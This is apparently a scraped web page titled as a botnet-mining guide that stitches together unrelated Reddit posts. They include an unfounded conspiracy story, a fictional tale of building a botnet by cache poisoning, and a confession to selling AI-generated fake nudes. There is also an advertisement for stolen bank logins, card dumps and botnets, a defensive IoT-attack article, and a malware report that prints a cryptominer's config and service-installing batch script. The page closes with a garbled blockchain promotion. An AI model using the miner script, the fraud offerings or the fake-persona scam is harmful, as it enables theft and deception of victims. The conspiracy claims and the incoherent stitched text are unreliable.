How To Make A Botnet For Bitcoin Mining CryptoCoins Info ...

Clinton Foundation Investigation

A subreddit for the ongoing investigation into the Clinton Foundation. Want to help? Follow the sidebar.
[link]

Multi Mining

This subreddit is dedicated to profit based coin mining pools.
[link]

I've been sharing conspiracies on reddit longer than this sub has been around. I have a story to tell.

This story is mostly crafted from my own experiences, my conversations with some of the people involved, and the rest is my own guesswork as I try to fill in the gaps...so bear with me!
That's why I wanted to share with this community, which I've watched grow over the years. I remember posting about the death of Barry Jennings (who witnessed explosions in the WTC on 9/11) the day after it happened. This was before /conspiracy (or right around when it was formed), and I remember thinking "we really need a sub for conspiracies on reddit!"
And here we are, 12 years later and over 1.3 million subscribers...incredible!
So...
My story starts with a young man. We'll call him Andrew.
Andrew grew up in the 90's in a coastal US town and quickly blossomed into a tech whiz at a young age.
He began building his own computers, and after a brief stint using Windows, he decided that Bill Gates was everything wrong with technology (and the world), and he made it his mission to make sure folks like Gates were NOT the future of computers.
He really believed that the use of technology was a fundamental human right, and that charging people for "proprietary" OS's that hid their source code was a violation of these rights.
He saw a possible Deus Ex-like future, with a technocracy literally around the corner if we didn't act now.
Andrew soon joined the Free Software Foundation and began rubbing elbows with the likes of Richard Stallman. He begun exclusively using GNU/Linux and was the type to correct you if you called it just "Linux". He also began visiting tech-savvy forums like slashdot and started networking in earnest.
By 2006 (his senior year of high school) Andrew was completely over his "education" and decided to just drop out completely.
Shockingly, a college accepted him anyway. A small East Coast school had been actively courting Andrew, and when they learned he had failed to get his HS diploma, they accepted him anyway!
Now sometime during this period Andrew went to Iceland and stayed in Reykjavik for several months.
This trip may have happened during the summer, fall, or early winter of 2006. The reason for his trip had something to do with his efforts in the FSF or similar group. The possible significance of this trip will become clear as we go on.
What is clear is that Andrew started college in the fall of 2006, and that the circumstances were unusual. Andrew soon met several like-minded individuals and began building a social and technological network at his school.
Two individuals in particular would become key players in his life (one more prominently in this story, but the other was significant as well), and eventually the 3 would live together in town for several years.
But for now let's stick with Andrew.
Andrew had an idea to build a social network for his college. Except, it wasn't just a network, it was a wiki for information about the school...and beyond. Soon, it began to morph into something much bigger in Andrew's mind.
He saw his project as being one of many data "hubs" for leaks of important documents and otherwise sensitive information.
So yeah, he saw the opportunity for a wiki for leaks (see where this is going yet...?).
As his ambitions grew, his behavior started to become increasingly erratic. He was caught with drugs and arrested. Strangely, the charges were pretty much dropped and he was given a slap on the wrist. Eventually he decided to leave the school, but still lived in town and had access to the servers on campus.
By 2010 Andrew was still living in the small town with his two "hacker" buddies, who were still enrolled at the school.
This house was in some ways legendary. It appears that many "interesting" people spent time at or visited the residence. Indeed, some of the early movers and shakers of /conspiracy itself passed through.
There was usually a full NO2 tank for anyone who was into that kinda thing, and they were stocked with every hallucinogen and research chemical known to man.
It was also likely under surveillance by multiple intelligence agencies (NSA/Mossad/etc).
Over time, the mental state of Andrew was slowly starting to deteriorate, which wasn't helped by his abuse of drugs.
Still, Andrew decided to move his base of operations to Europe, spending time in Belgium, the Czech Republic and elsewhere.
One of his housemates was soon to join him on his adventures in Europe and elsewhere abroad. We'll call him "Aaron."
Aaron had a very similar story and upbringing as Andrew. Aaron was also from a coastal US town and was born into privilege. He was also, supposedly, born into a family with some serious connections to intelligence agencies, including an uncle with ties to the NSA, and both parents connected to military brass.
By 2015, Andrew and Aaron were living together in the Czech Republic. During this time they were working directly and/or indirectly for the NSA (via Cisco and other companies).
You see, the "college" they met at was actually a front for the recruitment of kids into the IC. Apparently, many "schools" in the US function that way. Go figure.
Their intelligence and valuable skill set (hacking etc) made them valuable assets. They were also possibly involved with the distribution of certain "research chemicals" (of the 2C* variety) to dignitaries and their entourages (in one example, they provided 2CB to a group with David Cameron).
In addition, Andrew was allegedly involved with, or stumbled upon, an NSA-linked surveillance project directed at the entire country of Malaysia, while Aaron was involved with Cisco.
Aaron himself had gotten into hot water for releasing damaging information about the NSA, and even claimed to be an NSA whistleblower, and was also possibly the individual who leaked the 2014 (or 2015) Bilderberg meeting list.
And then things went bad. Andrew quit the Malaysia project and Aaron left Cisco. It seems Andrew and Aaron were "set up" during a fiery false flag event in the Czech Republic in 2015. It may have happened at an embassy, but it's unclear which. There is no information on the web about anything like this (afaik).
Aaron was immediately targeted and spent several years on the run. Allegedly, he was added to the list of victims in the so-called "Great Game".
The Great Game is the term used for an international assassination program where intelligence agencies share a list of targets to be neutralized. The German BND and Mossad are heavily involved, as other networks. Individuals targeted by the Great Game may be offed by actual assassins, or by NPC-like humans whose minds will be influenced by mind control tech (a la Matrix...say influencing someone to ram your car unwittingly ie).
As Aaron went on the lam, Andrew soon returned to the US, shell-shocked by his experience.
Both Andrew and Aaron continue to suffer from some sort of PTSD from these series of events, rendering Andrew largely incapacitated and Aaron scattered and discombobulated.
The Meat of the Matter
OK...where does that leave us? Why am I sharing all of this? I think there's much more to this story.
So let's start speculating! Everything I'm about to say is stuff that was told to me personally. I can't vouch for any of this information, though obviously I thought it was compelling enough to share.
Here's the gist: The so-called whistleblowers you see in the media are almost all fake.
This includes: Edward Snowden, Julian Assange, Thomas Drake and William Binney (hey look, his AMA is pinned on this sub right now...no comment!). These individuals, and others, are controlled opposition. The real whistleblowers are severely punished.
For example, Bradley Manning was punished with chemical castration in jail. His "transformation" was chemically induced torture.
Andrew was not alone in his passion. There were lots of other young visionaries like him who dreamed of a freer and more transparent world.
In this story, Julian Assange was an intelligence asset...a psyop meant to steal the thunder from real activists like Andrew.
In this story, a small college-based "wiki" for government leaks was used as the model for an intelligence operation known as "wikileaks".
In this story, Andrew traveled to Iceland at some point in 2006.
When was Wikileaks founded? Wikileaks was founded by Julian Assange in December 2006, in Iceland.
Aaron discovered (legally, like Manning who had clearance to access all the data he leaked) damning information about surveillance happening by the NSA, specifically against recruits entering the US army and elsewhere.
In this story, the "Andrew" identity was co-opted and turned into "Julian Assange", and "Aaron" became "Edward Snowden".
Granted, there were probably other people that these whistleblower imposters were modeled after, but Andrew and Aaron seem like very strong contenders for some of this inspiration.
Now, much of the following may be gobbledygook (lol I spelled that right first try!) for all I know, but since I'm having a really hard time making sense of it all, I'll just include everything I can and let you guys run with it.
Here are some phrases, ideas, terms and people of note that may be involved with this story...MODS: None of this is doxing! All of the links of people are wikipedia pages or published interviews/articles. So yeah. Not dox!
IN CONCLUSION
I don't know how these terms, theories and individuals fit into this story, but that they may be somehow related.
Hopefully there are enough bread crumbs in here to keep some of you busy!
Any help/insight would be appreciated. I confess I'm not so tech-minded so I can't offer any more explanation about some of the more techy terms.
Anyway, thanks for reading, and thanks for continuing to stimulate after all these years! It's really nice to see this place continuing to thrive after all of this time!
submitted by oomiak to conspiracy [link] [comments]

[RF] Just another quiet Friday night

"You're fucking crazy John," the man in the black T-Shirt announced. "Seriously, you want to pretend to be a paedo, so you can lure in the FBI and fuck with them? That is some next level warped shit."
"Chill out dude. That was just an example. Doesn't have to be a paedo."
"I don't give a fuck. Anything that's gonna make them zero-day you is some dark shit that you can't just laugh off. And what if they chain the sploits? They'll bounce out of your sandbox and be kicking the door down in minutes."
"No, no, it's ok. Really. I bought these laptops from a heroin addict in another city. Totally untraceable. I've had the lid off and de-soldered the camera, microphone and wireless."
"That's no use, we've got to get online somehow. And when their payload fires they'll trace us through a ToR bypass."
"That's why we need three laptops. Physical separation. This one," he tapped the metallic blue case, "is the bait. It's a regular laptop, but it's only connection is a single wired Ethernet. The only route to the Internet is via this one," tap tap, "which is running hardened Kali and only connects via ToR."
"Seriously, you're going to actually do this?"
"Come on dude, I've always wanted to try. Live a little."
"What's the third one for?"
"It's hardened Kali too. We proxy everything from the bait browser through here. When they deliver their exploit we'll catch it here, do some reverse engineering, and get ready for the fun bit!"
"What the hell. But you're crazy man. And we never speak of this."
"Of course. Goes without saying."
"How do we start?"
"You get a proxy running on that. I'll get the ToR connection set up. I got a 4G dongle off the same guy."
John removed a small ethernet hub from his bag, connected its power but held off from plugging in the laptops. He connected the 4G dongle, started the ToR service and watch its status update. With the connection active he configured the iptables firewall so outbound traffic was permitted only through ToR. Cal started the intercepting proxy, exposed its listener and looked at John. "Ready" They both plugged into the hub, and Cal watched as John connected the bait laptop, accessed the proxy settings and linked it to the listener.
He accessed a non-descript site to check the setup. It loaded a little slowly, while the series of requests popped up on the intercepting proxy. "Are we sure it's going through ToR?" Cal asked. "Don't worry". "Seriously, show me a packet trace." John started a sniffer, gestured to Cal to refresh the bait browser, while a series of packets scrolled up the screen, all safely encrypted by ToR.
"So what now?" a pause "And definitely no paedo stuff. That's too dark to mess about with."
"Old school," John replied, "I guess it's a bit of a cliche. We go on the dark net and try to order a murder for BitCoin. We'll make it an American prosecutor, that'll get the FBI going."
Cal stared at him. But that didn't stop him typing and Cal watched with grim fascination as he navigated around dark net markets, registering accounts, searching vendors and sending onimous enquiries. Cal monitored the proxy, configuring ever more intricate filters to weed out the mundane.
They'd crossed a line of no return and complicit Cal joined in, weaving convincing tales in their messages, striking the right tone to complete their deception. This went on for hours, with no sign of any incoming exploits. Until the browser popped up with "Do you want to allow this site to access WebGL?"
"That's it," John smiled, "there's no way that site really uses WebGL. This is an exploit. Stands to reason too, we always knews that had huge attack surface." He was about to permit it, but Cal stopped him. "No, don't allow it. If we allow it, we'll just get a lame zero day that requires WebGL. Deny it and carry on. They'll send a better exploit soon enough."
The intensity increased, Cal identified the malicious code that had tried to access WebGL. But it was just a stager - no exploit there. John carried on his ruse, until he noticed the browser stutter. He grabbed Cal's arm, "this is it!" Fear in the room intensified. This was serious now, some hacker - be it FBI or otherwise - had control of the laptop right in front of them. "Carry on with the messaging Cal. If we stop now they'll know our game."
Cal typed into the bait laptop while John began to investigate the exploit delivery. He identified the malware quickly enough, and a lingering connection that could be to the command and control server. Alarmingly, it was transferring a lot of data in both directions, a detail he decided not to share with Cal. He loaded the malware into a binary analysis tool and begun the painstaking process of unpicking its workings. 20 minutes in he told Cal to stop. "That'll do. Sign off naturally and shut it down."
Cal joined him with the binary anaysis and gradually they formed a picture of its armory. "It's not like one I've seen before," Cal said, "it's tighter coded than a typical rootkit. Really could be FBI." John nodded. "You can see it repeatedly copying this string. That's gotta be a heap spray. And it looks like self-decrypting machine code. Yeah, that's the payload for sure. We can just plug our own in here."
"What if the exploit's been watermarked?" Cal interjected, "We don't know where they could have hidden one."
"Who cares? We're gonna deliver it anonymously anyway."
They worked industriously to decouple the exploit and payload, build a delivery mechanism, and soon they were ready to test it. They watched in delight as a fully-patched browser accessed their delivery site, churned the laptop's CPU, then registered a ping back on the console.
The next step was to incorporate a real payload.
"So what's it gonna do John?"
"Persist itself to disk, then sit quietly and await further instructions. I've got the C&C software figured out already, it was a fun project from long ago. What I need you to do is use BitCoin to rent a couple of dozen virtual servers in different data centres around the world."
As Cal started registering the servers, John used the third laptop to generate a public/private key pair. One by one, the servers came online, and John installed the C&C software, configuring each to only respond to instructions signed by their private key. On the 20th he told Cal to stop.
There was a sparkle in his eyes. "We're nearly there! Everything's in place."
"How are we going to deliver it?"
"That's why we had to do this today. I found something earlier. A cache poisoning vulnerability on a major site."
Cal stared at him. The chain was complete. This was not real.
They completed their final maneouvers. Scripted a mechanism to dynamically generate payloads containing a random sample of C&C servers. Uploaded the exploit delivery mechanism into the control cloud, and generated a list of exploit URLs. John accessed the vulnerable major site, saved the HTML code locally, and modified it to include an exploit URL. Then he exploited the cache poisoning flaw, so that every visitor - at least every visitor coming through that particular cache cluster - would receive not the legitimate site but his malicious modificiations.
They watched the C&C management console. Around the world, thousands of unsuspecting web users experienced an annoying pause while their web pages loaded. Each time, under the hood, the zero day exploit fired, the payload persisted itself to disk, and made a connection to their C&C network to receive further instructions. Each time a new node joined their botnet, a line was logged to their console, and soon the screen was scrolling uncontrollably.
John was elated, Cal terrified. Cal watched in horror as John repeated the cache poison process across multiple clusters in different data centres. The rate of scrolling on the C&C console exploded. John cancelled it with a smile.
"Lets just look at the numbers"
Running a grep count on the log showed over 900,000 payload activations. And their malware had been live for barely 15 minutes.
"What are you going to do with it?"
"That's for another day. Now, we cover our tracks."
John removed two USB drives from his bag. He created an encrypted container, and into it put his decoy. Some nudes of an office chick that had been circulating. Incriminating enough, but not the crown jewels. He then created a hidden container within the free space of the first container, using a very strong password. Into this hidden container he copied the private key for the C&C network. This key put him in control. The only way to control the botnot was having both the USB drive, and his strong password. He repeated the process for Cal, inviting him to choose his own passwords. When he handed over the drive, Cal held it like it was on fire.
He shut down the bait laptop, gesturing Cal to do the same with the proxy. Removed the hard drive and connected it via USB to the ToR relay. The ToR relay was unlikely to have been compromised that night, a trustworthy system he could use to erase the others. After a secure erase of both drives, then of the ToR relay itself, John started putting everything in a bag.
They left the hotel room in silence. Bag on the rear seat and John drove. Cal was acutely aware of the USB drive in his pocket, the angled corners pressing into his leg. He went out of town, down lanes Cal didn't recognise, and stopped by a chain link fence. They both got out, John retrieved the bag, and with a big hurl, launched it over the fence into the landfill.
Back home, John smoked a large joint of double zero hash and fell fast asleep. He awoke a few hours later. It almost felt like a dream. But he ran his fingers along the USB drive and remembered the sheer power it contained.
submitted by netsecwarrior to shortstories [link] [comments]

using AI in unethical ways

Hello, before I start spilling the beans let me give some background about myself. Since I was a little child my fascination on the topic of electricity and computing was immeasurable. This was not enough to be considered good at anything, everyone including myself viewed me as a failure, and I can't blame them, I didn't do any sports or had good grades. But one summer, it was about 5 years ago I have started exploring computer science, on my own. And my skills were improving really fast, but my family's constant disappointment pushed me away from anything, since my programs weren't good grades, and fuck me that I don't have good grades. This pushed me into a great depression, an insane one where I didn't felt like waking up anymore, except one day when I found out about artificial intelligence, and it's potential. At first it was just a hobby I kept secret from everyone since I don't want to let anyone know anything about me since I will be critiqued, but this hobby of mine turned into an obsession. Any money I could earn would go into video cards and any free time I had would go towards researching different AI's. My room turned into GPUs and wires. Electricity bill was getting out of hand with each day, this issue won't continue for long since I discovered an website named "this person doesn't exist", that site gave me an idea, one of the worst kinds, but quite profitable in money.
To reach that idea I have done a lot of research on genetic algorithms, deep learning, machine learning. This research gave birth to some new learning algorithms, and all of them combined let me virtual humans. At first I could get a realistic face, but it was not enough to reach my goal. I needed something to let me create poses at demand, this part took 6 months out of my life, nights I haven't slept, constant headaches and insane anxiety, not knowing if each attempt will work, all I could do is to wait until it fully trained on my dateset(who is just insane to gather enough data, and process them manually).
My nightmare ended with one algorithm who took a long time to adapt itself, but it showed potential. I wasn't deceived it kept working really well. But let's not forget why I wanted to make something that let me create a persona and pose it however I wanted, to pay my electricity bills and buy new upgrades for my botnet. So I opened an Instagram page, where I would impersonate a girl named Casey(not the name I had actually used, but I still want to keep this dirty business). She would put some provocative pictures of herself. It wasn't long until Casey(I don't identify as her, she is only an internet personality, I think) was asked for nudes so I agreed to sell them and get paid through bitcoin, my program could generate nudity with ease since all I had to do was to find what parameters influenced her clothing .
The sad part of my story is that I'm using others to live a lazy life. If you are wondering why don't I sell me work, or why don't I work in this domain officially and so on, the answer is simple, I don't have a college done, I need to work hard to gain less than I do from exploiting some horny people and I get to work on my latest project who is not related to any AI, a compiler. It might get me closer to self programming AI if I use an genetic algorithm on it. Don't expect any replies from me, since this is the first time and the last I'm logging on this account, and I hope my English didn't bothered you, it was built by many hours of playing games, farewell.
submitted by AIThrowAwayAcc to offmychest [link] [comments]

IMPORTANT NOTICE.

Hi everyone
We are Group of Young Rusian and australian Hackers, we will share with you all what we have and learn earlier .
BUY BANK LOGINS, CVV FULLZ, DUMPS, 101 & 201, TRANSFERS, TUTORIALS, SPAM TOOLS, RDP, VPN, BOTNETS, SCAM PAGES
Contact for help: [[email protected]](mailto:[email protected]) ICQ: 721808635
Buy Hacked PayPal, Bank Logins, WesternUnion, cc top up, cvv, smtp, RDP, inbox mailer, email leads, dumps, wares, with proofs of transactions and accounts.
I am selling hacked western union, hacked PayPal accounts, bank logins, MoneyBookers, CC details/transfer, Hacked iTunes Accounts, Dumps, wares and fullz infos. I have many customers and buyers all over the world and they trust me and i promised to never break this chain till DEATH
I'm offering many offers to earn online money through sources like western union transfers, bank transfers, moneybookers and PayPal transfers through offshore database.
All transactions are offshore and anonymous and has no trace backs or chargebacks
Come with us and enjoy the best products to make money , how to shop online ,buy your stuff freely and make much tax free Cash
Our online support only to serious customers
Country for sale : USA, UK, CA, AU, EU and more.
Credit Card All Countries
Western Union Money Transfers
Card Dumps, Track 1+2 (with pin)
Hacking Bank Login ,paypal world wide(bank transfers)
Payment methods: Bitcoin, Perfect Money, Web Money Hopefully we can find a good customer to do business together long term You will feel happy, confident and safe to work with us, that's for sure PRIX MSR:
MSR505 / MSR2000: 549 $ MSR505 / MSR300 *: 499 $ MSR505 / TA-48: 639 $ MSR206 / MSR3000: 729 $ MSR206 / MSR300: 549 $ MSR206 2× MSR400: 900 $ MSR206 2× MSR500m (Mini123): 875 $ MSR206 2× TA-32: 990 $ MSR206 2× CRM42: 869 $ MSR206 2×CRM41: 929 $
Western Union Transfer Rates
$1000 Transfer = $100 Charge $3000 Transfer = $250 $4500 Transfer = $350 $7000 Transfer $500
Bank Transfers :-
This is my responsibility is to transfer the required amount into your account from an offshore server, you have no trace back or charge backs, but it is your responsibility to handle the bankers and get safe your side. i will use my personal method for making clear payment so no dispute no charge back chances. (transferring all over the world)
Info needed for Bank transfers :
1: Bank name 2: Bank address 3: Zip code 4: Account Holder 5: Account number 6: Account Type 7: Routing number 8: Swift number 9: BIC and IBAN
Bank transfer will take maximum 6hours to show money in your bank account.
Bank Transfer Rates: $1000 transfer = $100 Charges $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $10,000 Transfer = $800 Charges $15,000 Transfer = $1200 Charges
MoneyBookers Transfer :- Offering moneybookers/skrill transfer worldwide. It is a instant payment/transfer. I’m using an offshore server to transfer moneybookers so there is no chargeback and negative feedback. (transferring all over the world)
Money Bookers Transfer Rates : $1800 Transfer = $150 Charges � $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $9000 Transfer = $700 Charges � $15000 Transfer = $1200 Charges
Paypal Transfer :- Paypal Transfer Rates: $1800 Transfer = $150 Charges $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $9000 Transfer = $700 Charges $15,000 Transfer = $1200 Charges
CreditCard TopUP Rates:- $1800 transfer = $150 Charges $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $10,000 Transfer = $800 Charges $15,000 Transfer = $1200 Charges
***Also selling RDP, SMTP SERVERS, WEBMAIL, MAILERS, BULK MAILS (US/UK based) DATING ACCOUNTS, cPanel HOSTING, Hacked Panels, CC dumps.
Thanks All. Contact: [[email protected]](mailto:[email protected])
submitted by Ezraunion234 to u/Ezraunion234 [link] [comments]

IoT Attacks, Hacker Motivations, and Recommended Countermeasures

IoT Attacks, Hacker Motivations, and Recommended Countermeasures


Illustration: © IoT For All
Businesses worldwide spent $1.5 billion on IoT security in 2019. When it comes to connecting devices via cellular IoT, the selling-point is typically the data and derived insights–this is where the customer sees real value, more so than in any security benefits. That said, IoT solution providers not taking security measures into consideration are risking significant revenue and reputation loss in the event of a security breach–both for their own business as well as their customer’s business.
In the worst cases, the harm done from one security breach will far outweigh any previously created customer value. IoT connectivity providers that can explain and demonstrate their security concepts will gain a competitive advantage.

Why Are Hackers Focused on IoT?

IoT attacks increased by 900% in 2019. So, why are hackers increasingly targeting IoT devices? There are several explanations:
  1. Lack of security software on the devices: Opposed to regular computers, IoT devices do not have a firewall or virus scanner.
  2. Less experienced device producers: The businesses usually come from the industry vertical and often are lacking the IT security expertise of servecomputer manufacturers.
  3. Multiple devices with the same security mechanisms: Once an attack works with one device it will work with thousands.
  4. IoT devices are out of reach: device owners deploy their machines remotely. Often an owner won’t realize that the devices have been compromised until it is too late. Once an attacker has control over a device, it could run all day long before being physically shut down by the owner.

Who Are the Attackers and What Motivates Them?

  • Amateur hackers and script kiddies – usually their objective is fame among their peers, either by targeting a high-profile victim or by demonstrating an ability to infect many devices in a single attack.
  • Governments/Intelligence organizations – acting in the safety of their citizens, intelligence agencies attempt to secure access to important information.
  • Political interest groups – they attack organizations that they think are morally corrupt. Examples are groups like anonymous.
  • Criminal businesses – organizations that take advantage of vulnerabilities within the target to generate revenue for themselves.
The criminal businesses mentioned above are typically set up as ordinary businesses and are especially relevant in the IoT domain. Their objective is to gain control over a large number of IoT devices and make money out of them, often in one of the following ways:
  • Selling Distributed Denial of Service attacks – like webstresser.org (more information via Forbes)
  • Using devices for Bitcoin mining (more information via CNBC)
  • Blocking the device operation until the owner pays a ransom (ransomware)

How Do IoT Attacks Work?

Mirai

The most common IoT attack today is the Mirai malware, which originated in 2016. The malware scans the public internet for IoT devices and tries to establish a remote telnet connection using a list of common factory default usernames and passwords. As soon as one device is infected, the malware begins scanning for more victims. All devices become part of the Mirai botnet which is then steered through the attacker’s command and control center. The attackers then execute a DDoS attack, on behalf of their customers, to a target destination in order to take down the servers of the victims.

Stuxnet

The Stuxnet computer worm was first uncovered in 2010. The malware first injects Microsoft Windows machines exploiting zero-day exploit or outdated OS versions; initially it spread over USB flash drives. On the Windows machine it looks for the Siemens Step7 software that controls the Siemens programmable logic controller (PLC). With the Step7 software it then installs itself on the IoT device and takes over control. Stuxnet once targeted Iranian facilities and reportedly severely harmed the Iranian atomic program.

Silex/Brickerbot

While Brickerbot was discovered in 2017 and Silex appeared in 2019, they have a common attack pattern. Like Mirai, the software scans the public internet and tries to log in to the IoT device with default and weak login and password combinations. After infection, the software overwrites all data and deletes the network configuration, which makes the IoT device unusable, unless someone can physically get a hand on the device.

Countermeasures to Guard Against Attacks

As seen in the Stuxnet attack, IoT devices in the same network as other machines can be impacted by the vulnerabilities of those other machines. To avoid this, using a dedicated network infrastructure is recommended, instead of using shared LAN or Wi-Fi networks. Alternatively, using cellular communication that separates the communication of the different machines is also preferred.
The Mirai and Silex / Brickerbot malware show the value of having random and unique log-in credentials for the different devices – this could have prevented the above-mentioned attack. While the devices allowed for remote access by their owners, the access was granted via the unsecured public internet. A more secure way to get remote access to IoT devices is to use IPSec or Intra-Cloud Connect, avoiding the exposure of public Internet.
One way to prevent attempts to steal remote access to IoT devices, as well as completely block attacks, is to use a cellular firewall. With a cellular firewall, devices are only permitted to communicate with a defined subset of IP addresses. The firewall itself is not located on the individual devices, rather on the cellular connection – out of the attacker’s control.

Key Takeaway: Security First

While the excitement surrounding the brimming potential of IoT connectivity is understandable–and warranted–overlooking IoT device security can prove catastrophic. A robustly secured IoT solution is one that can safely scale globally, enable groundbreaking solutions, and last for years to come.
Originally published by EMnify -| August 12, 2020 iot for all
submitted by kjonesatjaagnet to JAAGNet [link] [comments]

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

CYPHERIUM ENHACES BLOCKCHAIN TECHNOLOGY

OVERVIEW
Rarely has any technology such as blockchain attracted the public and media organisations. Institutions designed to catalyze the fourth industrial revolution are experimenting with technology, and investors have invested hundreds of millions of dollars in blockchain companies. This is a low-risk, experimental environment with error protection. Innovation is a combination of creativity and implementation. Ideas often must go through an evolutionary or cyclical phase before they are ready for commercialization. In fact, the cycle is so long that it is too expensive, inefficient in terms of time and money to generate and generate ideas, and in most cases almost never reaches commercial value. Thus, almost 99% of venture capital firms fail.
A fast growing technology that has come to enhance the blockchain technology is CYPHERIUM.

CHALLENGES FACING THE BLOCKCHAIN TECHNOLOGY
The Bitcoin framework is one of the most notable usage of blockchain innovations in circulated exchange based frameworks. In Bitcoin, each system hub seeks the benefit of putting away a lot of at least one exchanges in another square of the blockchain by comprehending a complex computational math issue, here and there alluded to as a mining verification of-work (POW). Under current conditions, a lot of exchanges is ordinarily put away in another square of the Bitcoin blockchain at a pace of around one new square like clockwork, and each square has an inexact size of one megabyte (MB). As needs be, the Bitcoin framework is dependent upon a looming versatility issue: as it were 3 to 7 exchanges can be handled every second, which is far underneath the quantity of exchanges handled in other exchange based frameworks, for example, the roughly 30,000 exchanges for each second in the Visa™ exchange framework. The most huge disadvantage of the Nakamoto accord is its absence of irrevocability. Conclusion implies once an exchange or an activity is performed on the blockchain, it is for all time recorded on the blockchain and difficult to turn around. This is fundamental to the wellbeing of money related repayment frameworks as exchanges must not be saved once they are made. For Bitcoin's situation, noxious on-screen characters can alter the exchange history given enough hash power, causing a twofold spending assault, given that there is sufficient motivator and money related practicality to complete such assaults. Given that mining gear leasing and botnets are at present predominant around the world, such an assault has become achievable.
Because of this absence of conclusiveness, Nakamoto accord must depend on additional measures, for example, confirmation of-work to forestall pernicious exercises. This hinders the capacity ofNakamoto accord to scale in light of the fact that a exchange must hang tight for various affirmations before coming to "probabilistic absolution".
In this way, wellbeing isn't ensured by Nakamoto agreement, and so as to secure the system, each exchange must experience extra an ideal opportunity to process. For Bitcoin's situation, an exchange isn't considered last until in any event six affirmations. Since Bitcoin can just process a couple of exchanges every second, the exchange cost is preposterously high, making it unreasonable for little installments like shopping for food or eatery feasting. This extraordinarily frustrates Bitcoin's utilization as an installment strategy in this present reality.

CYPHERIUM SOLUTIONS
Cypherium's exclusive algorithm, CypherBFT conquers burdens of the earlier craftsmanship by giving a circulated exchange framework including a gathering of validator hubs that are known to each other in a system however are undefined to the next system hubs in the system. As utilized thus, the gathering of validator hubs might be alluded to as a "Board of trustees" of validator hubs. In a few explanations, the framework reconfigures at least one validator hubs in the Committee dependent on the consequences of confirmation of-work (POW) challenges. As per some uncovered epitomes, a system hub that isn't as of now a validator hub in the Committee might be added to the Committee on the off chance that it effectively finishes a POW challenge. In such an occasion, the system hub may turn into another validator hub in the Committee, supplanting a current validator hub. In elective epitomes, a system hub may become another validator hub in the Committee dependent on a proof-of-stake (POS) accord. In yet another epitome, a system hub may turn into another validator hub in the Committee dependent on a verification of-authority (POA) agreement. In other elective exemplifications, a system hub may turn into a new validator hub in the Committee dependent on a mix of any of POW, POA, and POS accord.

In some revealed exemplifications, the new validator hub replaces a validator hub in the Committee. The substitution might be founded on a foreordained guideline known by all the hubs in the system. For model, the new validator hub may supplant the most established validator hub in the Committee. As indicated by another model, the new validator hub may supplant a validator hub that has been resolved to have gone disconnected, become bargained (e.g., hacked), fizzled (e.g., because of equipment breakdown), or in any case is inaccessible or not, at this point trusted. In the praiseworthy exemplifications, the circulated framework expect that for an adaptation to non-critical failure of f hubs, the Committee incorporates at any rate 3f +1 validator hubs.
Since the validator hubs in the Committee might be every now and again supplanted, for instance, contingent upon the measure of time required to finish the POW challenges, it is hard for vindictive outsiders to identify the total arrangement of validator hubs in the Committee at some random time.

BENEFITS OF CYPHERIUM BLOCKCHAIN TECHNOLOGY
Cypherium runs its exclusive CypherBFT accord, tied down by the HotStuff calculation, and can genuinely offer moment irrevocability for its system clients. With its HotStuff-based structure, the CypherBFT's runtime keeps going just 20-30 milliseconds (ms). A few affirmations are all that is required to for all time acknowledge a proposed obstruct into the blockchain, and it just takes 90ms for these affirmations to come to pass, making the procedure essentially quicker than the two-minutes required by EOS.
Cypherium's CypherBFT, which additionally uses HotStuff, doesn't have to pick between responsiveness and linearity. Cypherium's double blockchain structure incorporates the velocities of a dag, however its review for clients can occur a lot more straightforward and quicker, which adds to the accessibility of data and makes the data more decentralized.
